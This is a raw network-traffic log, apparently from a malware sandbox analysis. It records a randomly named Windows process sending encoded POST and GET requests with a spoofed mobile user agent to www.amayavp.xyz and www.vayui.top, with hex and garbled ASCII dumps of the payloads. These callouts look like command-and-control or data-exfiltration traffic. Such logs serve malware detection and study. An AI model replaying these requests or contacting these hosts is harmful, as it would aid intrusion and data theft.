                                                          Data Raw: 31 62 61 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 05 88 42 a1 29 99 f9 6b fd 4d d1 ba 6e e0 9c a8 13 9d 6a 64 83 6f 96 9c 38 e0 09 97 47 dd ec 60 07 bd cd 35 7b f6 27 48 3d 38 e6 d6 08 a4 4b 02 53 77 7a a8 55 0b e0 27 15 ed 19 26 13 ed 17 b4 bf 80 a0 6e 25 37 66 ca d7 73 29 cb 09 46 ce 22 72 00 a7 bc fa fc ae 9c 1f 32 49 44 29 4a 3a d8 08 52 65 bc 3b 70 58 d2 0e 67 1c a1 7f 88 fb fe 7f 8a c4 93 df 46 e8 00 d7 8a 53 9f df d8 a9 4c a9 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 52 d7 f3 b9 de 5d ea f0 4d c1 3c f6 0a 42 1c 54 5a 85 96 7b df f6 2a c4 31 f2 b1 8a 32 5e bb cf f0 7d 09 53 d8 84 10 c5 17 47 09 34 88 32 be ec b2 37 24 f4 bf de 9e 56 00 fd 07 0c 9c 31 a3 a5 4b a5 ce b2 dc 95 92 0b cb 0b d6 90 ce 30 99 9a 12 22 6c 6c 5e 4b 51 94 a5 cd bd f7 82 db 42 ca 52 c8 94 c9 9c 09 66 4a 19 44 3a 40 f6 71 99 71 a1 73 5e e6 85 ce d2 3c 67 a1 a1 0b 6e 44 99 96 d2 b1 94 89 11 57 6e 62 b7 8d 9e 00 a6 14 fc fd 5d fa c5 52 c1 18 69 88 60 e7 af ef 3f a8 f3 76 be 9b 2e 23 8b 73 ac b1 41 28 86 15 88 cc 0f 55 [TRUNCATED]
                                                          Data Ascii: 1ba rrB)kMnjdo8G`5{'H=8KSwzU'&n%7fs)F"r2ID)J:Re;pXgFSL]i]??B_{R]M<BTZ{*12^}SG427$V1K0"ll^KQBRfJD:@qqs^<gnDWnb]Ri`?v.#sA(Uhh2d<+*_?#)UrS}Ps_(eGQIK#Jjk!DRJB'0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.749984185.27.134.144801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:17.930413008 CET783OUTPOST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 239
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 77 4f 4b 57 4e 49 42 65 61 52 47 54 51 77 58 4b 59 43 50 6b 51 6c 44 52 69 51 48 2b 58 53 50 70 73 53 37 6e 4a 54 4e 59 57 73 6c 79 66 6a 74 7a 38 3d
                                                          Data Ascii: T0_8iD=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfGwOKWNIBeaRGTQwXKYCPkQlDRiQH+XSPpsS7nJTNYWslyfjtz8=
                                                          Nov 20, 2024 10:18:18.526820898 CET684INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:18:18 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 61 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 05 88 42 a1 29 99 f9 6b fd 4d d1 ba 6e e0 9c a8 13 9d 6a 64 83 6f 96 9c 38 e0 09 97 47 dd ec 60 07 bd cd 35 7b f6 27 48 3d 38 e6 d6 08 a4 4b 02 53 77 7a a8 55 0b e0 27 15 ed 19 26 13 ed 17 b4 bf 80 a0 6e 25 37 66 ca d7 73 29 cb 09 46 ce 22 72 00 a7 bc fa fc ae 9c 1f 32 49 44 29 4a 3a d8 08 52 65 bc 3b 70 58 d2 0e 67 1c a1 7f 88 fb fe 7f 8a c4 93 df 46 e8 00 d7 8a 53 9f df d8 a9 4c a9 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 52 d7 f3 b9 de 5d ea f0 4d c1 3c f6 0a 42 1c 54 5a 85 96 7b df f6 2a c4 31 f2 b1 8a 32 5e bb cf f0 7d 09 53 d8 84 10 c5 17 47 09 34 88 32 be ec b2 37 24 f4 bf de 9e 56 00 fd 07 0c 9c 31 a3 a5 4b a5 ce b2 dc 95 92 0b cb 0b d6 90 ce 30 99 9a 12 22 6c 6c 5e 4b 51 94 a5 cd bd f7 82 db 42 ca 52 c8 94 c9 9c 09 66 4a 19 44 3a 40 f6 71 99 71 a1 73 5e e6 85 ce d2 3c 67 a1 a1 0b 6e 44 99 96 d2 b1 94 89 11 57 6e 62 b7 8d 9e 00 a6 14 fc fd 5d fa c5 52 c1 18 69 88 60 e7 af ef 3f a8 f3 76 be 9b 2e 23 8b 73 ac b1 41 28 86 15 88 cc 0f 55 [TRUNCATED]
                                                          Data Ascii: 1ba rrB)kMnjdo8G`5{'H=8KSwzU'&n%7fs)F"r2ID)J:Re;pXgFSL]i]??B_{R]M<BTZ{*12^}SG427$V1K0"ll^KQBRfJD:@qqs^<gnDWnb]Ri`?v.#sA(Uhh2d<+*_?#)UrS}Ps_(eGQIK#Jjk!DRJB'0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.749985185.27.134.144801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:20.477077961 CET1796OUTPOST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1251
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 4e 4d 37 2f 72 74 2b 6e 4d 71 4d 55 34 36 41 41 5a 59 50 4e 4b 5a 4a 68 45 6d 50 59 59 37 4d 6a 4d 4c 64 77 69 2f 4f 65 36 42 4f 71 38 48 33 47 6f 46 4d 64 7a 68 2f 58 61 38 37 47 70 42 4c 2b 6a 4c 35 71 37 66 30 77 63 4f 2b 6c 75 46 77 6c 49 73 73 4f 58 64 76 56 41 71 4d 67 4e 79 2f 53 51 59 75 6e 6e 75 72 61 70 4b 52 4d 7a 74 36 6e 78 65 2b 6e 48 47 63 47 53 33 42 4b 61 47 4d 58 34 52 4f 47 39 48 70 4c 4e 50 75 68 72 2b 4c 76 69 52 6c 70 57 4b 53 34 49 6c 69 48 74 70 55 56 58 [TRUNCATED]
                                                          Data Ascii: T0_8iD=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzJcnCgYtkOhTXcFHmqVdkJvtP+4NGfsiPgg5eh4jv1Je8nnmJqbBz8I7uCkhmhy7IQnd6lDUlpzEtQ4DQN1kYzn8KbskisOWGqAzLq7nOAGK5EhTOWh+mM2gaZhYnfZnoNM7/rt+nMqMU46AAZYPNKZJhEmPYY7MjMLdwi/Oe6BOq8H3GoFMdzh/Xa87GpBL+jL5q7f0wcO+luFwlIssOXdvVAqMgNy/SQYunnurapKRMzt6nxe+nHGcGS3BKaGMX4ROG9HpLNPuhr+LviRlpWKS4IliHtpUVXNz934+9Pi/udq2eU5x5+9BRxQA6Ms9Q50JU9U4ubXoTFOwWeKWsNFlHfc2IMsH0DbT1Un5Gph91dh/BeZJ2JAMzb2NGbUtqgSb0DZaNHsnBbrmRYI68ilK7vR9U/cXDOyGTdhBIKg+WGgN1jB1++QfNfbNRu27Y9WS9esXNSYAc+JMmCTLI4PJnAdRU+dZZT277j96rNzkQ3taNOqZIckgvaJ0Wkd2A+Z8AVLWbqWgbtJSEheMcP6QF922TnILY5kunDs5Dbll1Drnk59xLrtqkoJXnICeEiKJjJUCV2OPH6X6VLwtSzxhsw2sEaVLn32UtMA8oGB7XzMEYH8CcE5gUrmB2OL5W1f/IOZyby99ey8YB6x/heBlYfvA71xUHBTebBlz4UGd80WAjcvC7xtyA3Hdtgaf4pUS2lSKQErd1fj5ErVAGHNAbByb+5iXeIE3+G8iDmOEv0TBzVLgRY6xtyTIA/ZySn6947kXBPaQr/2hiUTs7w5dqInoQqffsZplwkdajjEX81UBGh906xBTrYDYqWaQ9v4H9O7p+TQOlSHEYTrt618JuPXufA1GA4lSFJ+Q20xzun8O4iAN7ZkDkoPuDBjPWJjWUAr8m0Sd9jXkwa3XZAVRcv6ea+cucp8Ou/YlW5bpGybfJpEg9sgmLVEms/PbjM33 [TRUNCATED]
                                                          Nov 20, 2024 10:18:21.093487978 CET684INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:18:21 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 61 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 05 88 42 a1 29 99 f9 6b fd 4d d1 ba 6e e0 9c a8 13 9d 6a 64 83 6f 96 9c 38 e0 09 97 47 dd ec 60 07 bd cd 35 7b f6 27 48 3d 38 e6 d6 08 a4 4b 02 53 77 7a a8 55 0b e0 27 15 ed 19 26 13 ed 17 b4 bf 80 a0 6e 25 37 66 ca d7 73 29 cb 09 46 ce 22 72 00 a7 bc fa fc ae 9c 1f 32 49 44 29 4a 3a d8 08 52 65 bc 3b 70 58 d2 0e 67 1c a1 7f 88 fb fe 7f 8a c4 93 df 46 e8 00 d7 8a 53 9f df d8 a9 4c a9 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 52 d7 f3 b9 de 5d ea f0 4d c1 3c f6 0a 42 1c 54 5a 85 96 7b df f6 2a c4 31 f2 b1 8a 32 5e bb cf f0 7d 09 53 d8 84 10 c5 17 47 09 34 88 32 be ec b2 37 24 f4 bf de 9e 56 00 fd 07 0c 9c 31 a3 a5 4b a5 ce b2 dc 95 92 0b cb 0b d6 90 ce 30 99 9a 12 22 6c 6c 5e 4b 51 94 a5 cd bd f7 82 db 42 ca 52 c8 94 c9 9c 09 66 4a 19 44 3a 40 f6 71 99 71 a1 73 5e e6 85 ce d2 3c 67 a1 a1 0b 6e 44 99 96 d2 b1 94 89 11 57 6e 62 b7 8d 9e 00 a6 14 fc fd 5d fa c5 52 c1 18 69 88 60 e7 af ef 3f a8 f3 76 be 9b 2e 23 8b 73 ac b1 41 28 86 15 88 cc 0f 55 [TRUNCATED]
                                                          Data Ascii: 1ba rrB)kMnjdo8G`5{'H=8KSwzU'&n%7fs)F"r2ID)J:Re;pXgFSL]i]??B_{R]M<BTZ{*12^}SG427$V1K0"ll^KQBRfJD:@qqs^<gnDWnb]Ri`?v.#sA(Uhh2d<+*_?#)UrS}Ps_(eGQIK#Jjk!DRJB'0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.749986185.27.134.144801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:23.023329020 CET511OUTGET /d9ku/?T0_8iD=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J7PmuLndACswz8W5sWEpwPhuKvdySEUjJ8t8ASEzjrGn86fUzHZrSxfB&DfkXi=Fj7DJJpHnHupXFB HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Nov 20, 2024 10:18:23.635010958 CET1203INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:18:23 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 1001
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                          Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("4168a26423a10225f7a36b84049d5058");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?T0_8iD=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J7PmuLndACswz8W5sWEpwPhuKvdySEUjJ8t8ASEzjrGn86fUzHZrSxfB&DfkXi=Fj7DJJpHnHupXFB&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.749987172.67.145.234801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:30.053014040 CET757OUTPOST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 219
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 56 30 2b 4e 49 36 75 54 6e 79 56 48 7a 65 4c 68 30 6d 35 2f 41 49 34 6b 66 51 63 41 4f 30 44 35 72 59 31 64 59 66 52 75 6f 61 34 72 72 56 55 64 2b 51 3d 3d
                                                          Data Ascii: T0_8iD=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDV0+NI6uTnyVHzeLh0m5/AI4kfQcAO0D5rY1dYfRuoa4rrVUd+Q==
                                                          Nov 20, 2024 10:18:30.624804974 CET885INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:18:30 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BusMcrBw7Sya0s0Auen0oPF0%2FDRzA5P8p%2FOBnO5%2BhmQLEjcNlMnmbD1JGk3NDccyn7AlCse7z04R5U%2BQn4poytUYUu9RYzNGMrjvytvw1LVUqr1WX7quo5ZR4Kv4e1Fd"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8e575a604ae2de9a-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1601&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.749988172.67.145.234801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:32.604346991 CET777OUTPOST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 239
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 41 66 62 53 34 32 5a 53 65 4d 70 5a 78 46 56 39 6c 50 33 74 64 42 6d 48 31 5a 6f 6b 52 32 6d 4b 50 30 30 41 4a 69 33 54 59 71 43 6e 42 54 4d 64 67 3d
                                                          Data Ascii: T0_8iD=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZAfbS42ZSeMpZxFV9lP3tdBmH1ZokR2mKP00AJi3TYqCnBTMdg=
                                                          Nov 20, 2024 10:18:33.218903065 CET885INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:18:33 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJDe5RF%2FxGlQv4LSz77RTv2fWFmmggIEwJ7P%2Bl2AT%2FHcoXS%2BuVen40YkiFD5LZNj6lQpfkV%2BO17n7xIBoQPrMcgtZevG06YmONzbDXG8isauyxUAi2e0Oa3F0sKc0qBf"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8e575a706b0d0f63-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1591&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=777&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.749989172.67.145.234801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:35.151011944 CET1790OUTPOST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1251
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4a 73 74 70 6e 5a 31 67 45 4a 46 49 55 57 59 53 59 6d 4a 43 71 62 6e 37 74 5a 53 66 6f 73 31 39 70 41 67 47 4a 35 71 68 30 79 7a 37 62 61 34 6c 56 48 36 56 73 6c 54 79 52 2b 55 34 70 55 71 37 2b 70 47 63 79 61 46 4a 77 55 61 74 51 46 68 52 6d 36 59 64 74 66 2f 36 5a 35 2b 53 4b 71 58 4b 41 31 57 36 79 79 6d 73 30 50 70 6f 2f 71 74 52 65 59 52 6b 6b 79 66 68 45 77 78 59 45 44 6d 2b 4e 52 33 46 6a 32 45 48 4e 39 43 45 39 77 53 30 59 39 6f 39 37 71 36 69 6d 42 38 75 6c 67 75 69 39 [TRUNCATED]
